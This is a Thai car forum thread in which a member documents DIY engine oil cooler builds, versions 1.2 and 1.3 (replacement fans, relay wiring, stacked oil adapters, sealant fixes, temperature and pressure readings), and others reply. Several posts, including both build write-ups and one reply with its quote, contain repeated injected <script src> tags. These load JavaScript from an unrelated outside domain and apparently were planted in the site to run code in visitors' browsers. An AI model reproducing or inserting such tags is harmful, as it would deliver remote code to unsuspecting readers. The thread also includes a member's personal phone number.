  Oil temp อยู่ที่ 90-95 องศาไม่เกินนี้ ส่วนวิ่งตอนกลางวันจะเพิ่มขึ้นอยุ่ที่ 105 องศาแต่อากาศตอนกลางวันจะร้อนมาก

สรุป โปรเจคต่อยอด Engine Oil Cooler version 1.1 สามารถทำให้ Oil temp ลดลงได้อย่างชัดเจนครับ พอใจมาก


ถ้ายังไหวไปต่อกันที่ version 1.2 ด้านล่างเลย


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 19 ธันวา 2014 01:21, ทั้งหมด 3 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: Saka  nayyai1  Zoulmate_Es  karnmotocross01  jeang  Thetom  Wuttikri Boonlert  Mongkol Seedaduang 
xyzxyz442


ชื่อเล่น: กัน

เข้าร่วม: 28 สิงหา 2010
ตอบ: 13

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 27
ให้คำขอบคุณ: 0

ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 9 พฤษภาคม 2014 13:53 - DIY Engine Oil Cooler
ทำ version 1.2 เลยพี่...... แก้ เรื่อง oil press สวิง มันต้องมีวิธี เอา oil press sensor ไปใส่ ที่เดิม ได้ดิพี่ รอดู สนับสนุน เผื่อจะทำตามบ้าง
ได้รับคำขอบคุณจาก: riper_zero  Wuttikri Boonlert 
riper_zero


เข้าร่วม: 25 กุมภา 2011
ตอบ: 181

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 228
ให้คำขอบคุณ: 88

ที่อยู่: เมืองทองธานี
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 9 พฤษภาคม 2014 16:39 - DIY Engine Oil Cooler
xyzxyz442 พิมพ์ว่า:
ทำ version 1.2 เลยพี่...... แก้ เรื่อง oil press สวิง มันต้องมีวิธี เอา oil press sensor ไปใส่ ที่เดิม ได้ดิพี่ รอดู สนับสนุน เผื่อจะทำตามบ้าง


ขอบคุณมากครับ สำหรับกำลังใจ ถ้าจะทำ โทรมาคุยแลกเปลี่ยนข้อมูลกันได้นะครับ 089-9363382

Version 1.2 มีแล้วครับ แต่ยังไม่ใชเรื่อง pressure ครับ ขอรวบรวมข้อมูลก่อน จะรีบเอามาลง
ส่วนเรื่อง Pressure คงต้องเป็น version 2.0 เลย เพราะต้องเปลี่ยนอุปกรณ์หลักบางชิ้นครับ

ปล. อีกมุมหนึ่งนะครับ การที่ เซ็นเซอร์ oil press วางอยู่ตำแหน่งหลังน้ำมันออกจากแผงออยก็มีข้อดีนะครับ คือถ้าแผงออยรั่ว หรือสายหลุด แรงดันที่วัดได้จะตกทันที เกจ์ก็จะร้องเตือน ช่วยเซฟเครื่องยนต์ด้วย
ได้รับคำขอบคุณจาก: Wuttikri Boonlert 
wasan_ceo


ชื่อเล่น: โจ้

เข้าร่วม: 29 กันยา 2013
ตอบ: 573

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 589
ให้คำขอบคุณ: 93

ที่อยู่: กระบี่
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 9 พฤษภาคม 2014 18:11 - DIY Engine Oil Cooler
+1 ให้กับความคิดที่เป็นประโยชน์และความตั้งใจ เยี่ยมมากครับ
รอความคิดดีๆ โปรเจคต่อไปครับ 
ได้รับคำขอบคุณจาก: riper_zero  Wuttikri Boonlert 
riper_zero


เข้าร่วม: 25 กุมภา 2011
ตอบ: 181

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 228
ให้คำขอบคุณ: 88

ที่อยู่: เมืองทองธานี
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 9 พฤษภาคม 2014 19:28 - DIY Engine Oil Cooler
wasan_ceo พิมพ์ว่า:
+1 ให้กับความคิดที่เป็นประโยชน์และความตั้งใจ เยี่ยมมากครับ
รอความคิดดีๆ โปรเจคต่อไปครับ 

ขอบคุณนะครับ
aumlight


ชื่อเล่น: อั้ม

เข้าร่วม: 27 พฤษภาคม 2013
ตอบ: 925

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 675
ให้คำขอบคุณ: 155

ที่อยู่: ES เมืองทอง
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 12 พฤษภาคม 2014 11:28 - DIY Engine Oil Cooler
ติดตามอยู่นะครับ

ได้รับคำขอบคุณจาก: riper_zero 
riper_zero


เข้าร่วม: 25 กุมภา 2011
ตอบ: 181

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 228
ให้คำขอบคุณ: 88

ที่อยู่: เมืองทองธานี
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 12 พฤษภาคม 2014 12:10 - DIY Engine Oil Cooler
aumlight พิมพ์ว่า:
ติดตามอยู่นะครับ


ขอบคุณครับ  เพิ่งกลับจากต่างจังหวัด หมดแรง    version 1.2 ข้อมูลครบแล้ว ใกล้คลอดแล้ว

 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
จันทร์, 12 พฤษภาคม 2014 13:47 - DIY Engine Oil Cooler
พัดลมที่นำมาประกอบกับแผงออย มันโดนน้ำได้หรือป่าว ช่วงนี้ฝนตกบ่อย ๆ ระวังมอเตอร์จะพังเอานะ
ได้รับคำขอบคุณจาก: riper_zero 
riper_zero


เข้าร่วม: 25 กุมภา 2011
ตอบ: 181

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 228
ให้คำขอบคุณ: 88

ที่อยู่: เมืองทองธานี
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 12 พฤษภาคม 2014 17:28 - DIY Engine Oil Cooler
Saka พิมพ์ว่า:
พัดลมที่นำมาประกอบกับแผงออย มันโดนน้ำได้หรือป่าว ช่วงนี้ฝนตกบ่อย ๆ ระวังมอเตอร์จะพังเอานะ


โดนเลยครับ นี่แหระคือที่มาของ version 1.2.
ได้รับคำขอบคุณจาก: Saka 
riper_zero


เข้าร่วม: 25 กุมภา 2011
ตอบ: 181

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 228
ให้คำขอบคุณ: 88

ที่อยู่: เมืองทองธานี
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 13 พฤษภาคม 2014 01:18 - DIY Engine Oil Cooler
Engine Oil Cooler version 1.2
    
      เหตุเกิดเพราะความจำเป็น
   
      เริ่มกันเลยครับ หลังจากทำ v.1.1เสร็จ ก็ใช้งานต่อเนื่องมากอีกซักระยะ เกิดอาการผิดปรกติขึ้น คือ เวลาจอดติดไฟแดง ทำไม Oil temp ถึงพุ่งขึ้นไปที่ 105 เลย ซึ่งปรกติจะอยู่ประมาณ 90-95 องศา  หาเวลาว่าง(เริ่มไม่ค่อยจะมีละตอนนี้)ถอดกันชนตรวจสอบหน่อยครับว่าเกิดอะไรขึ้น ปรากฎว่าพัดตายทั้งสองตัวเลยครับ คงเป็นผลพวงจากช่วงนี้มีฝนตกบ่อย การเจาะท่อดักลม ทำให้น้ำเข้าเต็มๆ  และพัดลมที่ใช้ไม่ได้ออกแบบมาใช้ทนความชื้น เลยตายในหน้าที่  เป็นเหตุให้มีความจำเป็นอย่างเร่งด่วนที่จะต้องสรรหาพัดลมที่สามารถใช้เพื่อการนี้โดยเฉพาะ เริ่มจากไปเดินเชียงกงดูตามร้านขายพัดลมหม้อน้ำ ก็มีให้เลือกหลากหลาย แต่ขนาดใหญ่เหลือเกิน คงไม่สามารถยัดเข้าไปได้แน่นอน  แต่ได้ไอเดียมาจากเจ้าของร้านที่ผมไปรื้อกองพัดลมซะเละเทะเลย ว่า ถ้าจะเอาเล็กขนาดนั้นไปหาพัดลมหม้อน้ำมอเตอร์ไซด์ดีกว่ามั้ง พอได้ไอเดียปุ๊บก็เดินออกจากร้านเลย ไม่ซื้ออะไรเค้าด้วย มาหาข้อมูลในgoogle ซะหน่อย เจอพัดลมใบสีสมขนาดกำลังดีน่าจะใช้ได้ เป็นของมอเตอร์ไซด์ sonic 125 แต่ตัวนี้ทำงานอัตโนมัติโดยใช้เทอร์โมสตัทที่ฝังในหม้อน้ำแต่เราไม่มีจุดฝัง แล้วจะทำยังไงดีละ คิดซิ๊ๆๆๆๆๆๆๆ  สรุป ไปหาซื้อมาให้ได้ก่อนค่อยว่ากัน เลยบึ่งรถไปตลาดพูลทรัพย์ทันที(อีกแล้ว) เดินจนจำหน้าสาวๆหน้าร้านได้เกือบทุกร้านและยังไม่เจอเลยไอ้พัดลมใบสีส้มๆเนี่ย เจอแต่ที่ขายพร้อมหม้อน้ำเลยใช้สูตรเดิมอ้อนคนขายอีกตามเคย  "แยกได้คะพี่ พัดลม 750 หม้อน้ำ 400  ถ้าซื้อรวมก็ 1050 "  คือสภาพหม้อน้ำที่ผมเห็นคิดไม่ออกว่าจะเอามาทำอะไรนอกจากเอาหนุนล้อตอนขึ้นแม่แรง  ไม่ไหว พักกินน้ำก่อนร้อนเหลือเกิน......เวลาผ่านไป 1 ชั่วโมงกว่า... ไปได้ไอ้นี่มาครับ แบบงงๆ ยังไม่รู้ว่าจะยัดลงไปได้ป่าว แต่แม่ค้าสวย เลยจัดมา 2 ตัวเลยให้รู้แล้วรู้รอดไป อาจจะเย็นทั้งจังหวัดเลยก็เป็นได้ใครจะรู้ ราคาสองตัวก็แพงกว่าพัดใบส้มของแม่ค้าข้างบนอยู่ไม่กี่ร้อย  มันคือพัดลมหม้อน้ำ CBR 250 cc บาง เรียบ เนียน สวย 

DIY  Engine Oil Cooler

วิธีการติดตั้ง
     1. ผมโม้ต่อละกัน เพราะวิธีมันไม่ตายตัว เนื่องจากแผงออยออกแบบมาให้ใช้กับพัดลมเคสคอมพิวเตอร์ขนาด 12 cm ผมจึงนำพัดลมเดิมที่เสียมารื้อเอามอเตอร์กับใบพัดออกและตัดแกนพลาสติกยึดมอเตอร์ ให้เหลือแต่กรอบโล่งๆ เพื่อเป็นฐานสำหรับยึดตัวพัดลมกับแผงออยตามรูปข้างล่าง 
DIY  Engine Oil Cooler
   
      2. นำไปติดกับแผงออย ตามรูปด้านล่าง สังเกตว่ากรอบพัดลมสีขาวจะใช้ได้แค่ตัวเดียว เพราะถ้าใช้สองตัวขาพัดลม cbr จะชนกันไม่สามารถใส่ได้ เชื่อผมอย่าคิดมาก พัดลมอีกตัวผมใช้สายน้ำมันมาเป็นบุชรองให้สั้นกว่ากรอบพัดลม ดูรูปเถอะนะ    ในรูปยังไม่ได้เก็บสายนะ
DIY  Engine Oil Cooler

      3.ขั้นตอนต่อไป อันนี้ภูมิใจเล็กๆ ตอนสมัยเรียน ไฟฟ้า 1,2 ได้D+ ได้นำมาใช้ละ  เนื่องจากพัดลมสองตัวนี้ใช้กระแสไฟเพิ่มขึ้นมาก การต่อไฟตรงมาจากพัดลมแอร์ อาจทำให้สายไฟรับกระแสไม่ไหวและเกิดการใหม้ได้ จึงต้องต่อ รีเลย์เพิ่ม ไปค้นๆห้องเก็บของ (อีกแล้ว) เจอชุดสายไฟหน้ารถพร้อมรีเลย์เก่าๆอยู่สองตัวเลยนำมาดัดแปลงวงจรเล็กน้อยเพื่อต่อเข้ากับพัดลม  ซื้อฟิวส์ 20 แอมป์ต่อเพิ่มเข้าไปด้วยกันไว้หน่อย (การต่อรีเลย์ไม่ขอบรรยายนะครับ เพราะระหว่างกำลังต่อรีเลย์ช่างทาสีที่ออฟฟิสมาถามเหมือนกัน พอผมอธิบายไป  เค้าทำหน้าเหมือนกำลังเรียนฟิสิกส์เลย ลองเปิดกรูเกิลดูดีกว่าผมว่าไม่ยากเท่าไร )  ยังคงใช้พัดลมแอร์เป็นสวิตช์ให้พัดลมแผงออยทำงาน

DIY  Engine Oil Cooler

   ประกอบเสร็จ ตรวจสอบความเรียบร้อย สตาร์ทเครื่อง เปิดแอร์ โอ้แม่เจ้า พลังลมอันมหาสารของพัดลมสองตัว มาพร้อมกับเสียงอันยิ่งใหญ่ เมื่อรวมกับเสียงพัดมแอร์ และพัดลมหม้อน้ำที่ทำงานพร้อมกันแล้ว เปรียบเหมือนอยู่ในสนามรบที่มีเฮลิคอปเตอร์บินอยู่ใกล้ๆ 4 ลำ.........เวอร์ไป  เสียงดังแต่พอรับได้

มาดูผลการทดสอบกัน 
   มีทริป เล็กๆ ไปหนองบัวลำภู ศุกร์-อาทิตย์ ที่ผ่านมาระยะทาง พันกว่ากิโลได้ทดสอบกันเลย

     DIY  Engine Oil Cooler
      -ออกจากรุงเทพคืนวันศุกร์ รถติดมากๆๆ และผู้โดยสารป่วยนอนหลับไปตลอดทาง เลยไม่มีอะไรหวือหวามากนัก อุณหภูมิอยู่ในช่วง 85-95 องศา มีไปแตะๆๆ 100 องศาบ้างตอนที่ลดแอร์เพราะผู้โดยสารตืนมาบ่นว่าหนาว(ตรงนี้เริ่มสกิดใจว่า การต่อสวิตช์จากพัดลมแอร์น่าจะไม่ค่อยเหมาะสม แต่ก็ยังครอบคลุมการใช้งานส่วนมากอยู่)
     -ขากลับออกจากหนองบัวบ่ายโมงแดดจัด อากาศร้อนอุณหูมิสูงสุดที่วัดได้ประมาณนี้ 
DIY  Engine Oil Cooler

      -สิ่งที่วัดความสามารถพัดลมสองตัวนี้อย่างชัดเจนคือ เวลาจอดติดไฟแดง 60 วินาที แอร์ทำงานตลอด   oil temp จาก 100 องศา ลดลงเหลือ 90 นิดๆ ถือว่าความร้อนลงเร็วมาก ดีเกินคาด(ความร้อนหม้อน้ำยังอยู่ประมาณ 90 องศาเลย) 
      -มาขึ้นทางด่วนบางปะอิน(ประมาณสองทุ่มกว่า) ตามฟอร์ม กดซิครับยาวๆ 30 กม มาลงเมืองทอง เกจ์ไม่ร้องซักแอะ เหลือเชื่อ พอใจสุดๆครับ  เรามาถูกทางแล้ว

สรุป
-พัดลม CBR ดีกว่าพัดลมเดิมมาก ทั้งด้านประสิทธิภาพ และความเหมาะสมต่อสภาวะการใช้งาน
-การต่อสวิตช์จากพัดลมแอร์ ครอบคลุมการใช้งานส่วนใหญ่  แต่การใช้งานส่วนที่เหลือคือ สภาวะที่แอร์ตัดบ่อยๆ หรือตอนที่ใช้รอบสูง อาจจะต้องศึกษาเรื่องการต่อสวิตช์ตรงไว้เปิดเอง(ไม่จริงจังมากนัก เพราะแค่นี้ก็พอใจแล้ว)
-ปัญหา-พัดลมที่ใช้กรอบพัดเดิมเป็นฐาน ไม่มีบูชยางรอง เกิดการสั่นสะท้านมาถึงเท้า อันนี้ต้องปรับปรุงแก้ไข

 
จบแล้วครับ Engine Oil Cooler version 1.2  เพ้อเจ้อเยอะไปหน่อยนะครับ ไม่อยากให้อ่านกันแล้วเครียดเกินไป
   

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">

ใน version ต่อไป จะเริ่มแก้ปัญหาเรื่อง แรงดัน จะเริ่มจากสิ่งที่แก้ได้ง่ายๆก่อน แต่ต้องของเวลาหน่อยนะครับ เพราะหมกมุ่นกับรถมากพอสมควรจนคนรอบข้างบ่นว่าผมเป็นโรคเสพติดรถแล้ว 

ต่อกันด้วย version 1.3  ด้านล่างครับ
 


แก้ไขล่าสุดโดย เมื่อ พฤหัส, 15 พฤษภาคม 2014 01:08, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: Saka  nayyai1  Zoulmate_Es  เดิมก็ดี  Thetom  Wuttikri Boonlert 
riper_zero


เข้าร่วม: 25 กุมภา 2011
ตอบ: 181

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 228
ให้คำขอบคุณ: 88

ที่อยู่: เมืองทองธานี
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 15 พฤษภาคม 2014 00:59 - DIY Engine Oil Cooler
Engine Oil Cooler version 1.3
   
         บ้าพลัง !!!!!!!

คนรอบข้าง: ไหนว่าจะหยุดแล้วไง?????
ผม : เอาน่า....ก็แค่ไปเปลี่ยนน้ำมันเครื่อง
 
        เริ่มจากการไปเปลี่ยนน้ำมันเครื่องจริงๆ  ระยะทางที่วิ่งจาก V.1-V1.2 รวมๆก็ประมาณเกือบ 4000 กม. ปัญหาต่างๆก็ปรับแก้ไขมาจนรู้สึกว่าระบบเริ่มเสถียรแล้ว ถ้าเครื่องจะพังก็คงพังไปนานแล้ว และก็เลยระยะเปลี่ยนถ่ายน้ำมันเครื่องมาเยอะแล้ว ก็ถึงเวลาอันควรที่จะต้องเปลี่ยนถ่ายน้ำมันเครื่องเสียที่ แล้วตั้งใจว่าจะวิ่งด้วย V. 1.2 ไปจนถ่ายน้ำมันเครื่องครั้งหน้าค่อยว่ากันใหม่  แต่เหตุการณ์มันไม่เป็นเช่นนั้น
         เมื่อยกรถขึ้นเตรียมเปลี่ยนถ่ายของเหลว ปรากฏว่าช่างเจอจุดที่น้ำมันเครื่องซึมนิดๆบริเวณข้อต่อทองเหลือง ขนาดอัดกาวแล้วนะเนี่ย ยังไงก็ต้องแก้ไขก่อนเพราะเสียดายน้ำมันที่จะเปลี่ยนเข้าไป ช่างบอกว่าคงเป็นเพราะข้อต่อมันเยอะเกินไปเลยแนะนำให้เหลือไว้แค่หางปลาตัวเดียว  เลยถอดข้อต่อตรง และข้องออกให้เหลือตามภาพด้านล่าง
DIY  Engine Oil Cooler
       อัดกาวเรียบร้อย ก็ลองนำไปประกอบดู.....ตามคาด ไม่ว่าจะหมุนยังไงก็ไม่สามารถใส่ได้เพราะหางปลามันยาวไปชนโน่นชนนี่ ก็เลยต้องหาวิธีแก้ไข แต่ยังไงซะหางปลาก็ต้องหันลงที่พื้นเพราะเมื่อเสียบสายจะมีพื้นที่ให้สายยางโค้งพอที่จะไม่หักงอ (ดูรูปประกอบด้านล่าง จะสังเกตว่าถ้าใส่อแดปเตอร์ตัวเดียว ยังไม่พ้นเหล็กสีเงินตรงขอบอ่างน้ำมันเครื่อง)

DIY  Engine Oil Cooler

   ถ้าจะให้อแดปเตอร์พ้นขอบอ่างต้องหนุนอแดปเตอร์ออกมา........
 (กดปุ่ม pause )หยุดตรงนี้แป๊บนึงนะ......นึกกลับไปใน V.1 ผมเคยพูดถึงว่า ถ้าจะไม่ให้ Oil Press ยังวัดค่าได้เหมือนเดิม และไม่สวิงขึ้นลง จะต้องนำอแดปเตอร์เฉพาะของ Oil press, Oil มาต่อก่อน แต่กลัวปัญหาเรื่องรั่ว เอาละครั้งนี้แหระจะได้รู้กันว่าจะเป็นยังไง  หน้าตาอแดปเตอร์จะประมาณนี้ครับ 
DIY  Engine Oil Cooler
   (รูปบน)สังเกตว่า ถ้าเราใส่เซอร์ตรงบริเวณน๊อตสีเงิน จะยังเหลือพื้นที่ให้น้ำมันผ่านเยอะอยู่
   (รูปล่าง) การซ้อนกันจะเป็นลักษณะดังรูป 
DIY  Engine Oil Cooler

     (กดปุ่ม Play) มาต่อกัน การซ้อนอแดปเตอร์ จะได้ประโยชน์ 2 ข้อคือ 1.ตำแหน่งตำแหน่งเซนเซอร์ Oil press ,Oil temp จะกลับมาอยู่ที่เดิม คาดว่าการวัดค่าจะดีขึ้น 2.ทำให้อแดปเตอร์ดึงน้ำมันไปแผงออยไม่ต้องใช้ข้อต่อเยอะ ลดความเสี่ยงเรื่องรั่ว  ระหว่างข้อต่อ และเซนเซอร์ก็ไม่ขวางทางเดินน้ำมันด้วย  
     ส่วนการแก้ปัญหาการรั่วระหว่างอแดปเตอร์กับอแดปเตอร์ ได้ทำการเปลี่ยน โอริงเป็นชนิด viton ทั้งหมด ซึ่งทนทานกว่าโอริงเดิม เมื่อทุกอย่างพร้อมก็ประกอบกัน.........ปรากฎว่า......ยังไม่ได้ครับ ระยะยังไม่พอให้หางปลาพ้นขอบอ่างน้ำมันเครื่อง เอาไงดีหาอะไรมาหนุนเพิ่มก็ไม่ได้ ก็เลย............เอาอแดปเตอร์มาหนุนเพิ่มอีกตัวแล้วกัน ห๊ะ.........ที่แหระครับเป็นที่มาของชื่อเรื่อง "บ้าพลัง" ก็ไปวิ่งหาซื้ออแดปเตอร์มาจนได้ (คิดเร็ว ตัดสินใจเร็วมาก กิเลสล้วนๆ)เปลี่ยนโอริงเสร็จสรรพ ก็ประกอบเลย เป็นไปตามภาพด้านล่าง 
DIY  Engine Oil Cooler

    ตามภาพ(บน) หางปลาพ้นขอบอ่างน้ำมันพอดี  ระหว่าใส่อแดปเตอร์ มีปัญหาที่บุชเหล็กยึดอแดปเตอร์ยาวเกินไป ขันจนยันก็ยังไม่แน่น ต้องส่งโรงกลึงตัดออกซะหน่อย นำกลับมาประกอบเสร็จเรียบร้อย จบไปหนึ่งเรื่อง......พักแปร๊บนึงนะ 
     

    มาต่อกัน เติมน้ำมันใหม่เข้าไป สตาร์ทเครื่อง และก็มองหาจุดรั่ว ซักพักก็ยังมีซึมๆอยู่เล็กน้อย ช่างยังไม่พอใจ รื้อใหม่ 
แล้วช่างก็เดินหายไปหลังร้าน ได้ยินเสียงโครมครามๆ  แล้วก็เดินออกมาพร้อมยาแก้ไอ 2 ขวด....ม่ายช่ายยยย....มันคือกาวทาประเก็นระดับตำนาน ช่างเล่าว่าเคยมี vios น๊อตยึดฝาสูบหวาน 1 ตัว ใช้กาวตัวนี้อัดอยู่เลย(ขนาดนั้นเลยๆๆๆ ในใจยังไม่เชื่อ) ปัจจุบันไม่ค่อยนิยมเพราะ หันไปใช้แบบหลอดที่บีบใช้งานง่ายกว่า

DIY  Engine Oil Cooler

  ไม่มีอะไรจะเสียแล้ว ก็ลองกันไป การใช้งานก็ใช้แท่งพลาสติกที่อยู่ในขวดปาดไปตามเกลียว ส่วนหางปลาก็ ทารองพื้น 1 ชั้นแล้วก็ใช้ผ้าพันเกลียวพัน และก็ทาทับอีกหนึ่งครั้ง ขันให้แน่ ทิ้งให้กาวเซตตัว ครึ่งชั่วโมง แล้วประกอบเข้าไป  
DIY  Engine Oil Cooler
ประกอบเสร็จ สตาร์ทเครื่องซักพัก ปรากฎว่ามันร่าเริง(ไม่ซึม) แล้ววว สมราคาคุย  55555

มาสรุปแยกเป็นประเด็น 
  1.เรื่องการรั่ว หลังจากที่โดนยาแก้ไอน้ำดำไป นิ่งสนิทไม่มีรั่ว ตรงบริเวณโอริงก็ไม่มีรั่ว เดี๋ยวสังเกตระยะยาวอีกที
  2.เรื่องการสวิงของแรงดัน ที่สังเกตุดูก็ยังมีสวิงบ้างเล็กน้อย แต่ดีขึ้นมาก
  3.เรื่องสำคัญ แรงดันครับ
    3.1ตอนเครื่องเย็นสนิท สตาร์ทเครื่องได้ตามภาพ 
DIY  Engine Oil Cooler
 
 กลับที่ 6 บาร์แล้ว     
<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
     
  3.2 Oil temp 70 องศาเดินเบา2.0บาร์   เร่ง 5000 รอบ  อยู่ที่ 6 บาร์กว่าๆ
      DIY  Engine Oil Cooler
    
       เดินเบาสูงกว่าตอนยังไม่ได้ติดตั้งแผงออยอยู่ 1 บาร์

  ตรงแรงดันทีเพิ่มขั้นจาก v.1  นั้น อธิบายง่ายๆ เปรียบเหมือนเวลาเราลากสายยางไปรดน้ำต้นไม้อยู่ แล้วมีคนเดินมาเหยียบสายยาง ผลที่เกิดขึ้นคือ ที่ปลายสายน้ำจะห่อเหี่ยวหมดแรง ส่วนต้นสายถ้ารัดไม่แน่นสายก็หลุดเพราะแรงดันน้ำเพิ่มขึ้น
คนเหยียบสายยาง =แผงออย
ปลายสายห่อเหี่ยว = ตำแหน่งวัดแรงดันใน V. 1
ต้นสายแรงดันเพิ่ม =ตำแหน่งวัดแรงดันใน  V.1.3 

ดังนั้น การเปลี่ยนตำแหน่งวัดแรงดันแทบไม่ได้มีผลต่อประสิทธิภาพ ช่วยได้แค่ทำให้แรงดับราบเรียบขึ้น และเซนเซอร์ไม่ไปบดบังทิศทางการไหล ในอแดปเตอร์แยกน้ำมันเป็นแผงออย  ด้วยเหตุนี้ช่างที่ติดตั้งไม่ค่อยสนใจแรงดันที่วัดได้ แต่สนใจว่าน้ำมันเครื่องพอต่อการหล่อลื่นหรือไม่(ดูใน v 1) 

 เนื่องจะจบ Project  Engine Oil Cooler version 1.X ที่เวอร์ชั่น1.3 นี้ ก็เลยอัดข้อมูลเข้าไปเยอะหน่อย  หลังจากนี้ถ้าจะมีต่อคงเริ่มที่  V 2.0   โดยที่คิดไว้คร่าวๆคือ กาขยายขนาดของท่อ และแผงออย  คงใช้เวลาซักพักใหญ่  




     ท้ายสุด  ขอให้เครดิตร้านที่ผมไปติดตั้งหน่อยนะครับ ถ้าไม่มีร้านนี้ คงไม่มีทางได้เริ่ม Project แน่นอน ช่างยังวัยรุ่นไฟแรง แต่ใจเย็นมาก รับฟังแนวคิด และยอมทำให้ เหมือนลองผิดลองถูกไปด้วยกัน จริงจะล้มตั้ง V.1 แล้ว แต่ช่างบอกว่า เสียเงิน เสียเวลาแล้วต้องเอาใช้จบ รื้อประกอบกันเป็นสิบครั้ง        เรื่องฝีมือก็ต้องลองไปใช้บริการกันดู  เข้าไปคุยกับช่างโดยตรงเลย  อยู่บนถนนติวานนท์ ถ้ามาจากสี่แยกสวนสมเด็จ มุ่งหน้าไปทางปากเกร็ด จะเลยแยกถนนเลี่ยงเมืองไปนิดเดียว หน้าร้านเป็นร้านยาง ชื่อทองกูลการยาง  ช่างชื่อช่างโอ ครับ  
 
DIY  Engine Oil Cooler


 
ได้รับคำขอบคุณจาก: Saka  nayyai1  Zoulmate_Es  fff_1232  Thetom  Supap  Wuttikri Boonlert 
aumlight


ชื่อเล่น: อั้ม

เข้าร่วม: 27 พฤษภาคม 2013
ตอบ: 925

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 675
ให้คำขอบคุณ: 155

ที่อยู่: ES เมืองทอง
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 15 พฤษภาคม 2014 07:31 - DIY Engine Oil Cooler
เยี่ยมมากๆ ครับ

ได้รับคำขอบคุณจาก: riper_zero  Wuttikri Boonlert 
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 19 พฤษภาคม 2014 09:25 - DIY Engine Oil Cooler
เยี่ยมมากครับ สุดยอด
ได้รับคำขอบคุณจาก: riper_zero  Wuttikri Boonlert 
ichamp.mixer


ชื่อเล่น: แชมป์

เข้าร่วม: 27 พฤษภาคม 2014
ตอบ: 10

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 8
ให้คำขอบคุณ: 0

ที่อยู่: กรุงเก่า
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 6 สิงหา 2014 15:08 - DIY Engine Oil Cooler
ได้ความรู้..เยอะเลยคับพี่
ได้รับคำขอบคุณจาก: riper_zero  Wuttikri Boonlert 
เทพ


ชื่อเล่น: เทพ

เข้าร่วม: 10 เมษา 2013
ตอบ: 424

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 280
ให้คำขอบคุณ: 1

ที่อยู่: ระยอง
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 24 สิงหา 2014 11:20 - DIY Engine Oil Cooler
มากๆๆๆๆๆๆ 
ได้รับคำขอบคุณจาก: riper_zero  Wuttikri Boonlert 
Khachi


เข้าร่วม: 28 พฤษภาคม 2012
ตอบ: 538

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1342
ให้คำขอบคุณ: 4
ศุกร์, 19 กันยา 2014 01:43 - DIY Engine Oil Cooler
อยากได้มั่งงบเท่าไหร่ครับ 555+"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: riper_zero  Wuttikri Boonlert 
riper_zero


เข้าร่วม: 25 กุมภา 2011
ตอบ: 181

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 228
ให้คำขอบคุณ: 88

ที่อยู่: เมืองทองธานี
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 2 ตุลา 2014 02:52 - DIY Engine Oil Cooler
Khachi พิมพ์ว่า:
อยากได้มั่งงบเท่าไหร่ครับ 555+"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">


ขอโทษที่มาตอบช้าไม่ได้เข้ามาดูเลย เพราะยังไม่มีอะไรอัพเดท
